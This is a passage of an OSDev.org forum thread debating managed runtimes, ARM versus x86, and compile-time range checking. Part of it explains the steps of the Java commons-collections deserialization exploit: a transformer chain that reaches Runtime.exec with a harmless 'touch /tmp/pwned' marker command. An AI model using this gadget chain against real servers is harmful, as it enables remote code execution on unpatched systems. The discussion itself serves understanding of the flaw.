OSDev.org

The Place to Start for Operating System Developers
It is currently Mon Mar 18, 2024 11:13 pm

All times are UTC - 6 hours




Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 5, 6, 7, 8, 9, 10  Next
Author Message
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 8:06 am 
Offline
Member
Member
User avatar

Joined: Thu Mar 27, 2014 3:57 am
Posts: 568
Location: Moscow, Russia
The vulnerability has recently been recognized by the way. It's fixed now.
Oracle wrote:
This is a remote code execution vulnerability and is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.

_________________
"If you don't fail at least 90 percent of the time, you're not aiming high enough."
- Alan Kay


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 8:30 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Schol-R-LEA wrote:
What he has said time and again is not this is wrong and always will be wrong, but rather, where is the advantage in it? All you need to do is go through the numbers and demonstrate that there are advantages to a managed system that cannot be achieved through an unmanaged system - something he would argue that you should have already done anyway before committing to this course of action.

I have it done. We had discussions before and the advantage list was introduced. But next the discussion got to the details of every item and from Brendan's point of view "it's useless bloat" I managed to understand he has no serious arguments.
Schol-R-LEA wrote:
you haven't agreed on your terminology

Ok, I can repeat it.

Managed environment employs a number of technics to control the software it runs. It means the environment manages the code. The forms of management are many and they differ one from another. The overall result of the technics employed is cost, speed and quality enhancement.

The cost here means total ownership costs for the user's system, including hardware, software, learning and support.

The speed here means:
- software performance in terms of time taken for a task to be completed
- developer performance in terms of "time to market"

The quality here means:
- less bugs
- better security
- better user experience
- less efforts for user to make his job done.
Schol-R-LEA wrote:
embryo2 wrote:
I assert there's no sane comparison between the ARM and Intel.

I agree, and would go so far as to say no such comparison can be made, for a number of reasons, starting with - once again - the lack of any clear idea of what a 'sane comparison' would look like.

Well, in fact you know it. Sane here means a thing which is agreed by many people. And yes, the word "agreed" means there will be no such thing. But if you have a tiny fraction of a desire to solve this problem then it's absolutely possible to discuss the matter and to elaborate some, may be not ideal, but working comparison. It's matter of your desire only. It seems Brendan has no such desire.
Schol-R-LEA wrote:
embryo2 wrote:
Have you provided any proof I am wrong?

You do understand that it is the person making a claim who holds the burden of proof, don't you? That's one of the cornerstones of both the scientific method and general engineering.

I made the claim - there's no sane comparison. Next I have shown the problem with the existing comparison search. Next you have agreed it's really hard. Next I asked you about what should I do. And your answer - it's your problem. Well, may I ask you, are you kidding?
Schol-R-LEA wrote:
The problem isn't the hardware, it's the software, and the effort it would take to either port the code or develop a software emulator that would perform adequately while supporting a sufficient portion of the existing code base, or some combination of the two.

Yes, compatibility is a problem. But do you agree the ARM has chance to win? It was the root message. And in fact you have agreed in a bin unclear manner (Intel is trash and so on).
Schol-R-LEA wrote:
Microsoft has been delaying the reckoning they know is coming on this matter, and until they act, the larger PC manufacturers will keep focusing their efforts on cheap PCs regardless of the long-term fallout because that's what their competitors are doing, and the software developers will keep doing things that misuse both the hardware and the OS in non-portable ways because they need an edge over their competitors. Until one of them changes what they are doing, the other two have to keep at it, too, or risk losing everything.

Ok, the problem is described by you. But why do you deny the solution? It's managed environment.
Schol-R-LEA wrote:
embryo2 wrote:
Schol-R-LEA wrote:
To get back to the main issue here, a large part of the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip.

It's a disputable version. My view is there's just common understanding of the old principle - simpler is better. So, simpler development pays a lot for Java and .Net and Intel here is almost irrelevant.

What I said wasn't opinion, it's a matter of historical record. While they never admitted those goals officially, several developers from both MS and Sun have come forward to say that reducing hardware vendor lock-in was among the (many) design goals of both systems.

Your words were - "the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip". As I read the translation for dislodge in many dictionaries it means the very serious efforts from the side that employs such goal. I very doubt the Microsoft has very serious plans for dislodging Intel. It was faced with Java and it's market share and only this fact was the key component of the decision made. And why Java has the world? Just because (as it was said) - the simpler is better.
Schol-R-LEA wrote:
embryo2 wrote:
Schol-R-LEA wrote:
Microsoft wanted to be ready to jump to PowerPC or Itanium

Recompilation takes much less efforts than creation of a totally different environment (managed).

What.

/me stares in shock at what Embryo just wrote

You're an OS developer. You should know that, managed or otherwise, a lot more goes into porting an OS - even one designed for portability - to a new hardware platform than just recompiling. A lot more.

Ok, do you know (as an OS developer) about efforts required to port Linux to the ARM or PowerPC? Has the Linux community managed to find resources for such efforts? Do you think Linux community has spent more resources than Microsoft on it's .Net?

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 8:46 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Roman wrote:
The vulnerability has recently been recognized by the way. It's fixed now.
Oracle wrote:
This is a remote code execution vulnerability and is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.

I should stress a bit - i.e., may be exploited over a network without the need for a username and password. It's not about remote command execution (like touch). It's about the way the guys from Oracle (in fact former BEA guys) implement the client-server communication. They just trust any deserialized object and in doing so they allow an attacker to send malicious commands to the server. But the commands are just from the set, which is implemented by the Oracle's guys. The boys just don't bother to check user's credentials and ready to run their own server's commands on behalf of an attacker.

Once more - the commands are already there and are just part of the server management console. No attacker allowed to do something like "touch /tmp/whatever".

And yes, if somebody "forget" about authentication, then it's security problem irrespective of the protocol involved. And yes, it's not Java problem. Or what do you think the number of Apache HTTP server security bugs is?

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 9:03 am 
Offline
Member
Member

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5069
embryo2 wrote:
Octocontrabass wrote:
The payload (ab)uses InvokerTransformer to specify an object that must be instantiated by calling the exec method of a Runtime object.

Can you specify the way it uses?

One of the members of the parent object is specified as an object that can only be instantiated by following a chain of transformers. The unserializer will then follow these steps in order to instantiate the member object:
  1. Create an object of the Runtime class
  2. Create an object by calling getMethod("getRuntime", new Class[0]) on the previous object
  3. Create an object by calling invoke(null, new Object[0]) on the previous object
  4. Create a new object by calling exec("touch /tmp/pwned") on the previous object

embryo2 wrote:
"magic"

Just because you do not understand does not make it magic.

embryo2 wrote:
His explanation will be - I just put the malicious class in the server's class path.

Please, ask the author. (Or indeed, ask anyone who understands Java better than I do.) I can guarantee with 100% certainty that the answer will not involve putting a malicious class in the server's class path. Instead, it will involve poor behavior of the readObject methods in commons-collections.

embryo2 wrote:
Have you noticed the enclosing object?

Which enclosing object?


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 1:32 pm 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
embryo2 wrote:
Schol-R-LEA wrote:
What he has said time and again is not this is wrong and always will be wrong, but rather, where is the advantage in it? All you need to do is go through the numbers and demonstrate that there are advantages to a managed system that cannot be achieved through an unmanaged system - something he would argue that you should have already done anyway before committing to this course of action.

I have it done. [emphasis added] We had discussions before and the advantage list was introduced.


embryo2 wrote:
Schol-R-LEA wrote:
You do understand that it is the person making a claim who holds the burden of proof, don't you? That's one of the cornerstones of both the scientific method and general engineering.

I made the claim - there's no sane comparison. Next I have shown the problem with the existing comparison search [emphasis added].

I must have missed the part where you showed, well, anything at all. I'll go back and look through the old posts, I guess. If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.

Getting back to what you said earlier in the post:

embryo2 wrote:
Schol-R-LEA wrote:
you haven't agreed on your terminology

Ok, I can repeat it.

Managed environment employs a number of technics to control the software it runs. It means the environment manages the code.


OK, then, now we are getting somewhere. The definition is a bit tautological and incomplete - it amounts to "A managed environment is one which manages code" without specifying what managing the code actually means - but it is more than we've had up until now. So, let's start by asking, what techniques do all 'managed environments' use?

embryo2 wrote:
The forms of management are many and they differ one from another.


This is something of a handwave, and while I understand that the two most widely used managed environments - JVM and .NET CLI - are quite different, you haven't explain how they are similar, and what makes them 'managed' versus, say, UCSD Pascal or FIG FORTH. What is it that makes a system 'managed', and what qualifies as a 'managed environment' that is new and unique? Would (for example) a compile-and-go Common Lisp REPL qualify as a 'managed environment'? What about Smalltalk-80 or Squeak? Or the original Dartmouth BASIC interpreter? What are the defining qualities of a managed environment, and how do they differ from earlier systems with some or all of the same properties?

Are their any characteristics that are absolutely required for a system to be considered 'managed'? A bytecode virtual machine (such as a p-machine interpreter or the Smalltalk engine)? A JIT compiler (like a Lisp or Scheme compile-and-go REPL)? Garbage collection (like more languages than I could hope to name, starting with LISP 1.5 in 1958 and including things as disparate as SNOBOL and Rust)? Runtime bounds checking (like every Pascal compiler ever written)? All of the above? None of the above? Something else? Definitions need to define, not just describe.

embryo2 wrote:
The overall result of the technics employed is cost, speed and quality enhancement.

The cost here means total ownership costs for the user's system, including hardware, software, learning and support.

The speed here means:
- software performance in terms of time taken for a task to be completed
- developer performance in terms of "time to market"

The quality here means:
- less bugs
- better security
- better user experience
- less efforts for user to make his job done.


And how is it supposed to accomplish these goals, and why can they be achieved in a 'managed environment' but not an 'unmanaged' one? As I've already pointed out, all the trappings of 'managed environments' that have been mentioned so far have appeared in the past, both individually or as a collection, so differentiating how a 'managed environment' differs from (for example) a UCSD Pascal p-System OS application with run-time checks running partly in an interpreter and partly as natively-compiled code isn't at all clear, nor is it clear that these properties add value that cannot be achieved in some other manner.

Unlike Brendan, I don't really have an axe to grind about this; indeed, my own planned language and runtime system will have a lot of these properties themselves. I am, however, trying to determine how to minimize the impact of them, by (for example) finding ways of performing static checks to eliminate most runtime checks, amortizing compilation time by moving most of the analysis to the AOT compile stage and bundling those results along with the AST, reducing repeated compiles through caching, and various other means of making the runtime environment less 'managed'. What I want to know is, how do you intend to address these issues in your system? Hell, if you're doing something interesting, I'd love to hear it so I can consider if I can apply it to my own work.

TL;DR - You need to figure out why you are doing what you are doing, and understand the trade-offs you are making for it, rather than spouting off lofty intentions with no idea how to achieve them.

embryo2 wrote:
Schol-R-LEA wrote:
The problem isn't the hardware, it's the software, and the effort it would take to either port the code or develop a software emulator that would perform adequately while supporting a sufficient portion of the existing code base, or some combination of the two.

Yes, compatibility is a problem. But do you agree the ARM has chance to win? It was the root message. And in fact you have agreed in a bin unclear manner (Intel is trash and so on).

ARM specifically? Hard to say. If any of the current systems are going to, it probably will be ARM, if only because with the rise of it's use in mobile systems, the chip production runs are now large enough to gain traction over the x86. However, it isn't clear if anyone (least of all the consumers) are going to win at all, or when. I don't doubt that ARM can outperform x86, if enough development work goes into pushing its performance; the questions are a) will any of the chip manufacturers currently producing that design be able and willing to commit to doing so, b) will the majority of software vendors - including, but not limited to, Microsoft - be able and willing to commit to transitioning to it at the cost of most of their existing software base, and c) will the motherboard and peripheral vendors go along with it.

This has nothing to do with technology and everything to do with profitability and risk management. As I said, everyone is expecting to happen eventually (if not with ARM, then some other, newer architecture), but no one is willing to stick their necks out to do it until they have no choice, especially at a time when the desktop market is already taking a beating from mobile platforms.

If you think you can talk, say, Asus into building an ATX form factor mobo that uses an ARM processor, then convince Microsoft to re-write desktop Windows for ARM, and then convince a significant number of users to buy them even though they won't run most Windows software, then maybe something will happen. In the meanwhile, we as hobbyists can wait and work on Raspberry Pis and BeagleBoards until the rest of the industry changes.

TL;DR: I agree, but what two hobbyist OS devs happen to think means nothing in the light of commercial reality.

embryo2 wrote:
Schol-R-LEA wrote:
Microsoft has been delaying the reckoning they know is coming on this matter, and until they act, the larger PC manufacturers will keep focusing their efforts on cheap PCs regardless of the long-term fallout because that's what their competitors are doing, and the software developers will keep doing things that misuse both the hardware and the OS in non-portable ways because they need an edge over their competitors. Until one of them changes what they are doing, the other two have to keep at it, too, or risk losing everything.

Ok, the problem is described by you. But why do you deny the solution? It's managed environment.


embryo2 wrote:
Ok, do you know (as an OS developer) about efforts required to port Linux to the ARM or PowerPC? Has the Linux community managed to find resources for such efforts? Do you think Linux community has spent more resources than Microsoft on it's .Net?


Actually, I would say that the total effort needed to port Linux to these platforms has been about the same, possibly greater. The difference is that the Linux work was done over a period of years, by large numbers of independent developers working on many independent projects, with few if any hard deadlines, so it is much harder to gauge the overall work put into it.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 2:33 pm 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Schol-R-LEA wrote:
I must have missed the part where you showed, well, anything at all. I'll go back and look through the old posts, I guess. If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.


This discussion actually started in a different topic back in January.

Near the start of that discussion I had trouble getting embryo2 to focus on the differences between managed and unmanaged (without getting side-tracked into things like large libraries and portability that apply to both managed and unmanaged). For this reason I defined "managed environment" as using software to perform additional checking at run-time (which isn't limited to techniques like JIT but includes an AOT compiler inserting run-time checks); and defined "managed language" as a language primarily intended to suit a managed environment (e.g. a language that prohibits things that can't be checked by a managed environment, like raw pointers and inline assembly). I've stuck to these definitions since.

Schol-R-LEA wrote:
embryo2 wrote:
Yes, compatibility is a problem. But do you agree the ARM has chance to win? It was the root message. And in fact you have agreed in a bin unclear manner (Intel is trash and so on).

ARM specifically? Hard to say.


It's easier than you'd think...

The thing is; Intel is an ARM licensee, and have also sold ARM CPUs in the past (StrongARM, XScale). As soon as Intel thinks there might be any actual risk of ARM getting into the desktop/server market they'll start producing their own ARM chips as insurance. Intel haven't done this (yet), so there's no chance of ARM winning the desktop/server market (yet). ;)


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 3:56 pm 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
Brendan wrote:
The thing is; Intel is an ARM licensee, and have also sold ARM CPUs in the past (StrongARM, XScale). As soon as Intel thinks there might be any actual risk of ARM getting into the desktop/server market they'll start producing their own ARM chips as insurance. Intel haven't done this (yet), so there's no chance of ARM winning the desktop/server market (yet). ;)

This is a good point, actually, though I am not sure if Intel would embrace ARM as their bread and butter (too much of a NIH factor, since they would be licensing it, and not enough options for keeping competing fabricators from doing the same).

While Intel certainly would like to move away from x86-64 (especially since they don't really control it as much as they would like to, given that the 64-bit extensions are based on AMD's design), they would at the same time prefer to have a firm grip on any replacement that comes along (though they might be willing to license the ISA if they own it themselves) just as a matter of basic business strategy. However, this has a history of backfiring for them (in addition to IA-64/Itanium family, which was aimed mainly at the server market initially, they had the earlier iAPX432, which got overshadowed by the supposedly interim 8086 architecture that was designed while it was being finished, and the i860 RISC CPU that was meant to become the next big thing in workstations around 1990) and others (e.g., the IBM PS/2 line), so they are biding their time on the matter. If another company comes up with a world-beating ARM system, then yes, they would probably jump on the bandwagon if they didn't have any alternative lined up, but until otherwise they will probably keep dithering on the issue until they are certain they've pushed x86-64 as far as they can.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 6:35 am 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
Brendan wrote:
Schol-R-LEA wrote:
I must have missed the part where you showed, well, anything at all. I'll go back and look through the old posts, I guess. If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.


This discussion actually started in a different topic back in January.


Ah, I forgot to thank you for that link. I'm going through the thread now, and already I have a number of things I've noted that seem problematic about several of the statements people are making (like the bizarre conflation of 'software development lifecycle' and 'program operational lifespan' on the part of Embryo in this post, or your own repeated assertion that overflows and buffer overruns can always be statically checked at compile time), but I am getting some sense of the history of this debate already. I wish I were surprised to see that most of the ground covered over and over again in this thread had already been well-trodden before, but duels of this sort are hardly uncommon in forum 'discussions' and the cycle is very difficult if not impossible to break one it has started.

WRT to one specific assertion mentioned earlier - that overflows can always be statically checked - I want to present a use case, and see how you would propose to handle it, as it should help clarify what we mean by the term 'runtime bounds checking'. Let us consider a case where an application program is simply incrementing a value that needs to be within a given range - say, 0 to 999 (the bounds are arbitrary, and I deliberately chose one not on a bit boundary; also, this need not reflect the effective values - for example, the 'real' values may be -250..749, with an offset of -250). Let us assume, for practicality's sake, a conventional byte-oriented architecture (that is to say, the operational unit of memory is an eight bit value). In this instance, the upper bound is too large to fit within a single byte, so we will need a two byte value to hold our counter - we can assume that they are a contiguous pair in whatever byte order the hardware uses, though if there are solutions which involve separating the value into individual bytes, I'd be willing to consider them. If we are simply incrementing the value using the increment or addition primitive, with no runtime check on the size of the value, then when the value is 999 prior to the increment, it will go to 1000, which exceeds the range of values we seek to use. In this instance, while there is no physical overflow of the value, it has exceeded the acceptable range of values. Thus, it seems to me that we will need to check the current value either prior to or immediately following the increment, regardless of how the increment is defined on a higher level of abstraction. Do you consider this to be a run-time bounds check, and if so, how would you eliminate the test?

Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.

Again, I am not specifically trying to poke holes in your claim, but rather looking to see just what it is you are actually claiming. I think that there still are a lot of undefined terms flying around, and it is high time we clarify them.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 7:35 am 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
I noted some flaws in my original use case, which I have corrected; you may want to review what I've changed.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 7:39 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
One of the members of the parent object is specified as an object that can only be instantiated by following a chain of transformers. The unserializer will then follow these steps in order to instantiate the member object:
  1. Create an object of the Runtime class
  2. Create an object by calling getMethod("getRuntime", new Class[0]) on the previous object
  3. Create an object by calling invoke(null, new Object[0]) on the previous object
  4. Create a new object by calling exec("touch /tmp/pwned") on the previous object

If we to represent your algorithm in a bit simpler and simultaneously a bit deeper form it would be like this:

  1. Send a magical class name using payload
  2. Expect the JVM will be able to instantiate some classes in class hierarchy that aren't present in the server's class path
  3. After some magic has helped the JVM to do some dirty work, deserializer runs getObject method of the magically summoned class
  4. getObject method starts the steps you have provided above (get Runtime, get exec, run it).

But I still see here some magic. Can I expect all Java systems can do it?

And once again, the algorithm is as such:

  1. Java takes class name
  2. Java loads the class (it's important!)
  3. Java invokes getObject method of the loaded class

If there's no step 2 then there's no getObject and nothing except the ClassNotFoundException.
Octocontrabass wrote:
Just because you do not understand does not make it magic.

Let me say it as such:

2+2=5.

And if you do not understand how it works it doesn't mean there's some magic.
Octocontrabass wrote:
Please, ask the author.

I want to show here that it is not Java's fault if somebody doesn't present full information about his newfound "vulnerability". And I don't want to discuss with the author his advertising tricks and his obfuscated text. And I doubt too much the author will agree to post here his apologies. And there's just no author's e-mail in the article.

If you still want me to contact him, please, give me his e-mail, I'll send him some information and reference to this thread.
Octocontrabass wrote:
I can guarantee with 100% certainty that the answer will not involve putting a malicious class in the server's class path.

Can you put some money on it? Or now it's only 99%?
Octocontrabass wrote:
Which enclosing object?

getObject method is enclosed in a class. Every method in Java must be enclosed in a class. There's no way of getting method without getting the enclosing class. And the class should be in the JVM's class path.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 7:58 am 
Offline
Member
Member

Joined: Tue Jan 21, 2014 10:16 am
Posts: 56
Schol-R-LEA wrote:
I noted some flaws in my original use case, which I have corrected; you may want to review what I've changed.


You'll want to read this introduction into abstract interpretation for a good intro into static analysis. You'll notice that this technique will either proof the program correct (by stating that the variable is always below 1000) or say that it cannot proof this. In the letter case two possibilities exits: a) The program is indeed wrong and b) the program is correct but analyser failed to proof this.

Now you could create a compiler that rejects all programs that are rejected by the static analysis and your program will be without buffer overflows if it compiles. You just removed all buffer overflows from your programs, but also many correct programs may not compile.

This would be practical if your analysis produces few false negatives. You can than go and either aide the analysis by providing more knowledge or adding a runtime check until the program compiles.

This is kinda the opposite approach of always adding a runtime check and removing it if the optimizer is sure that it isn't needed.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 8:43 am 
Offline
Member
Member

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5069
embryo2 wrote:
Expect the JVM will be able to instantiate some classes in class hierarchy that aren't present in the server's class path

There is no special class hierarchy here, only objects made from commons-collections classes.

embryo2 wrote:
But I still see here some magic. Can I expect all Java systems can do it?

The vulnerability is fundamental to the way commons-collections operates, so it should occur in any compatible Java implementation. However, I haven't tried the exploit in any non-Oracle JVMs, so I can't say for sure that it will work.

embryo2 wrote:
  1. Java takes class name
  2. Java loads the class (it's important!)
  3. Java invokes getObject method of the loaded class

If there's no step 2 then there's no getObject and nothing except the ClassNotFoundException.

I see no issues with step 2. The payload requires only classes in the JRE and commons-collections.

embryo2 wrote:
Let me say it as such:

2+2=5.

And if you do not understand how it works it doesn't mean there's some magic.

Of course, I understand mathematics. There is no magic here either.

2x + 2x = 5x

Algebra says you may divide both sides of the equation by x, resulting in the equation 2+2=5.

embryo2 wrote:
If you still want me to contact him, please, give me his e-mail, I'll send him some information and reference to this thread.

In the land of 2015, where any public-facing email address is scraped and spammed to oblivion by bots, no one with any sense makes their email address public. However, you can easily contact him through GitHub, Twitter, Reddit, and probably other sites as well.

embryo2 wrote:
Can you put some money on it? Or now it's only 99%?

Yes. How does $1000 USD sound? Please read the next section carefully before agreeing.

embryo2 wrote:
getObject method is enclosed in a class. Every method in Java must be enclosed in a class. There's no way of getting method without getting the enclosing class. And the class should be in the JVM's class path.

The getObject method is used by the code that generates the payload, it is not part of the payload. Do you see the return statement? The object returned there is serialized to become the payload.

The payload does not contain any references to getObject or its parent class (CommonsCollections1). You can easily verify this by examining the payload with a hex editor.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 8:45 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Schol-R-LEA wrote:
If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.

Thanks to Brendan, he just did it for me and you.
Schol-R-LEA wrote:
OK, then, now we are getting somewhere. The definition is a bit tautological and incomplete - it amounts to "A managed environment is one which manages code" without specifying what managing the code actually means - but it is more than we've had up until now. So, let's start by asking, what techniques do all 'managed environments' use?

Ok, let's go into details. Most important things are:

  1. Portable bytecode instead of machine specific code
  2. Language with some restrictions that help to make the code analysis easier
  3. Language that is easy to learn
  4. Rich set of libraries as a "must have" part of the Language
  5. Language with performance related hints and other additional runtime information (annotations)
  6. Ahead of time compilation
  7. Just in time compilation
  8. Automatic memory management
  9. Automatic (at least partially) resource management
  10. Very deep introspection capabilities at runtime (from within a program itself and from within an external tool like debugger)
  11. Control over the application life cycle (deployment, compilation, runtime, uninstall)
  12. Very smart compiler
  13. Ability to decide at compilation time if it is required or not to insert safety checks
  14. Ability to compile an application without safety checks and to run it under hardware protection
Schol-R-LEA wrote:
Would (for example) a compile-and-go Common Lisp REPL qualify as a 'managed environment'? What about Smalltalk-80 or Squeak? Or the original Dartmouth BASIC interpreter? What are the defining qualities of a managed environment, and how do they differ from earlier systems with some or all of the same properties?

I hope the list above defines most of the "defining" qualities. But still I can remember something else :) Well, really I haven't systematized the subject to the academic level.
Schol-R-LEA wrote:
Are their any characteristics that are absolutely required for a system to be considered 'managed'? A bytecode virtual machine (such as a p-machine interpreter or the Smalltalk engine)? A JIT compiler (like a Lisp or Scheme compile-and-go REPL)? Garbage collection (like more languages than I could hope to name, starting with LISP 1.5 in 1958 and including things as disparate as SNOBOL and Rust)? Runtime bounds checking (like every Pascal compiler ever written)? All of the above?

All of the above. The problem here is solved involving a lot of tools. One tool is never enough.
Schol-R-LEA wrote:
And how is it supposed to accomplish these goals, and why can they be achieved in a 'managed environment' but not an 'unmanaged' one?

Let's look at the time to market. If a language is easy to learn then it has deeper penetration into the developer community. If the language prevents some classes of bugs by it's design then applications will be less buggy. If the application's runtime information is easily accessible then applications are easy to debug and as a result they have less bugs. If a developer doesn't concerned with some common tasks like memory management then his productivity raises. If there's a rich library easily accessible for every developer then they can reuse a lot of code and do not need to reinvent a wheel, it makes them even more productive. If the environment allows to run the program under many operating systems then it again means the developer's productivity raises a lot because there's no need for recompilation and OS or hardware specific problem hunting.

Well, the list is really very long. It would be much easier to split it in parts. And even better just to answer your questions :) But I'm not going to escape the need for clarification.
Schol-R-LEA wrote:
so differentiating how a 'managed environment' differs from (for example) a UCSD Pascal p-System OS application with run-time checks running partly in an interpreter and partly as natively-compiled code isn't at all clear

The difference is simple - the number of things matter. It's about the environment, but not about one or another technic.
Schol-R-LEA wrote:
I am, however, trying to determine how to minimize the impact of them, by (for example) finding ways of performing static checks to eliminate most runtime checks, amortizing compilation time by moving most of the analysis to the AOT compile stage and bundling those results along with the AST, reducing repeated compiles through caching, and various other means of making the runtime environment less 'managed'.

Runtime information and runtime behavior are the things we need to look at. It's impossible to do every thing before the runtime.
Schol-R-LEA wrote:
What I want to know is, how do you intend to address these issues in your system?

My prototype is here and it's description provides some details about future development directions. But, of course, it's not a finished and polished thing.
Schol-R-LEA wrote:
ARM specifically? Hard to say.

ARM has biggest mobile market share. So it has some starting advantage. But of course, nobody knows the future.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 8:53 am 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Schol-R-LEA wrote:
WRT to one specific assertion mentioned earlier - that overflows can always be statically checked - I want to present a use case, and see how you would propose to handle it, as it should help clarify what we mean by the term 'runtime bounds checking'. Let us consider a case where an application program is simply incrementing a value that needs to be within a given range - say, 0 to 999 (the bounds are arbitrary, and I deliberately chose one not on a bit boundary; also, this need not reflect the effective values - for example, the 'real' values may be -250..749, with an offset of -250). Let us assume, for practicality's sake, a conventional byte-oriented architecture (that is to say, the operational unit of memory is an eight bit value). In this instance, the upper bound is too large to fit within a single byte, so we will need a two byte value to hold our counter - we can assume that they are a contiguous pair in whatever byte order the hardware uses, though if there are solutions which involve separating the value into individual bytes, I'd be willing to consider them. If we are simply incrementing the value using the increment or addition primitive, with no runtime check on the size of the value, then when the value is 999 prior to the increment, it will go to 1000, which exceeds the range of values we seek to use. In this instance, while there is no physical overflow of the value, it has exceeded the acceptable range of values. Thus, it seems to me that we will need to check the current value either prior to or immediately following the increment, regardless of how the increment is defined on a higher level of abstraction. Do you consider this to be a run-time bounds check, and if so, how would you eliminate the test?


For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.

The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....

If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.

Schol-R-LEA wrote:
Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.


The context only really effects what the compiler thinks the previous range of values in x could be. For example:

Code:
    x = 0                    ;Value in x ranges from 0 to 0 here
    if(y > 123) {
        x = 9                ;Value in x ranges from 9 to 9 here
    }
                             ;Value in x ranges from 0 to 9 here
    x = x + 1
                             ;Value in x ranges from 1 to 10 here


There are cases where the compiler simply isn't smart enough to track the range of variables properly and has to make assumptions. These assumptions can lead to "false negatives". For example:

Code:
    x = 1
                             ;Value in x ranges from 1 to 1 here
    while( x % 33 != 0) {
                             ;Compiler can't figure out the true range of x here but can
                             ;  assume x must range from 0 to 999 due to the variable's type
        x = x + 1            ;ERROR (potential overflow)
    }


